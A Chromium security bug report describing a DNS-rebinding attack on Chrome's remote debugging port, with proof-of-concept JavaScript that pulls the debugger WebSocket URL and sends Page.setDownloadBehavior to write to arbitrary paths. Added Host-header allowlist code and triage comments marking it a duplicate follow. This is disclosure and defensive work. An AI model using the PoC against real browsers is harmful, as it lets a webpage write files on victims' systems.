Issue 824816

Issue metadata

Status: Duplicate
Merged: issue 813540
Owner: ----
Closed: Mar 2018
EstimatedDays: ----
NextAction: ----
OS: Mac
Pri: 2
Type: Bug-Security

Remote debugging API vulnerable to DNS Rebinding, can write any file to system through setDownloadBehavior

Reported by, Mar 22 2018

Issue description

UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36

Steps to reproduce the problem:
1. Run "./Google\ Chrome --remote-debugging-port=9222"; the --remote-debugging-port option is quite normal in headless mode.
2. visits
3. has an <iframe> to, and has configured their DNS server to respond alternately with and (an address they control) with a very low TTL.
4. When the browser resolves to, they serve HTML that waits for the DNS entry to expire, then they XMLHttpRequest to and have permission to read the response.

<a id='halo' href="">halo</a>
// Synchronous request to the debugging endpoint's discovery URL; after the
// DNS entry has flipped, this reaches 127.0.0.1:9222 under the attacker's hostname.
var req = new XMLHttpRequest();
req.open('get', '/json/list', false);
req.send();
// The first target's WebSocket debugger URL, as returned by /json/list.
var wsurl = JSON.parse(req.responseText)[0].webSocketDebuggerUrl;
var ws = new WebSocket(wsurl);
ws.onmessage = function(msg) { console.log(msg.data); };
ws.onopen = function() {
    // DevTools protocol command that redirects downloads to an arbitrary path.
    ws.send(JSON.stringify({
        id: 123,
        method: 'Page.setDownloadBehavior',
        params: {
            behavior: 'allow',
            downloadPath: '/tmp/here/is_not/exists'
        }
    }));
};

setTimeout(function() {;}, 1000);  // the delayed action was elided from the report as filed

similar issue:

What is the expected behavior?
Check the "Host" header.

What went wrong?
A webpage is able to create any files or directories on the system.

Did this work before? N/A 

Chrome version: 65.0.3325.181  Channel: stable
OS Version: OS X 10.13.3
Flash Version:
Components: Platform>DevTools>Platform
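The mitigation the report asks for is a Host header check on the debugging endpoint. The block below is an added example, not the reporter's code and not Chromium's fix: a DNS-rebound request reaches the same loopback socket as a legitimate one, but the browser still sends the attacker's hostname in Host, so an allowlist of the loopback names the endpoint was started with is enough to refuse it before /json/list hands out a webSocketDebuggerUrl. The hostnames, the port and the listed sample requests are constructed for illustration; the EXAMPLE_ID target id is a placeholder.

```javascript
// Added example (not Chromium code): Host-header allowlist for a
// debugging endpoint that only binds to loopback.
const LOOPBACK_HOSTS = new Set(['localhost', '127.0.0.1', '[::1]']);

// Split a Host header into {host, port}; returns null for anything that is
// not a plain hostname, an IPv4 literal or a bracketed IPv6 literal.
function parseHostHeader(header) {
  if (typeof header !== 'string') return null;
  const value = header.trim().toLowerCase();
  const m = value.match(/^(\[[0-9a-f:.]+\]|[a-z0-9.-]+)(?::(\d{1,5}))?$/);
  if (!m) return null;
  const host = m[1].replace(/\.$/, ''); // "localhost." is still localhost
  const port = m[2] === undefined ? null : Number(m[2]);
  if (port !== null && (port < 1 || port > 65535)) return null;
  return { host, port };
}

// True only when Host names the loopback endpoint itself. An absent port is
// accepted (browsers omit default ports); an explicit port must match the
// port the server actually listens on, so a sibling service on the same
// host cannot be addressed through this check either.
function isAllowedHost(header, listenPort) {
  const parsed = parseHostHeader(header);
  if (parsed === null) return false;
  if (!LOOPBACK_HOSTS.has(parsed.host)) return false;
  if (parsed.port !== null && parsed.port !== listenPort) return false;
  return true;
}

// Gate for the /json/* discovery endpoints: the debugger URL list is only
// produced when the Host check passes; otherwise the request gets a 403.
function guardDiscoveryRequest(headers, listenPort) {
  if (!isAllowedHost(headers.host, listenPort)) {
    return { status: 403, body: 'Host header is not a loopback address' };
  }
  const targets = [{
    webSocketDebuggerUrl: `ws://127.0.0.1:${listenPort}/devtools/page/EXAMPLE_ID`,
  }];
  return { status: 200, body: JSON.stringify(targets) };
}

// Constructed sample requests (not captured traffic). The last two model
// the rebinding case from the report: the attacker's hostname resolves to
// 127.0.0.1 at request time, but Host still carries that hostname.
const SAMPLE_REQUESTS = [
  { host: 'localhost:9222' },
  { host: '127.0.0.1:9222' },
  { host: '[::1]:9222' },
  { host: 'localhost:9223' },
  { host: 'rebind.attacker.example:9222' },
  { host: 'localhost.attacker.example:9222' },
];

// Run every sample through the gate and report the status each would get.
function triage(listenPort) {
  return SAMPLE_REQUESTS.map((r) => ({
    host: r.host,
    status: guardDiscoveryRequest(r, listenPort).status,
  }));
}

console.log(JSON.stringify(triage(9222), null, 2));
```

The check is deliberately an exact-match allowlist rather than a suffix or substring test: `localhost.attacker.example` and `127.0.0.1.attacker.example` are ordinary attacker-controlled names, and a suffix test on `localhost` would admit them. The same comparison applies to the WebSocket upgrade request, whose Host header arrives through the same parser.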
Thanks for the report. I believe this is a duplicate of Issue 813540.

Comment 2 by, Mar 22 2018

Mergedinto: 813540
Status: Duplicate (was: Unconfirmed)
Agreed with #1. Marking as duplicate.
Comment 3 by, Jul 1

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
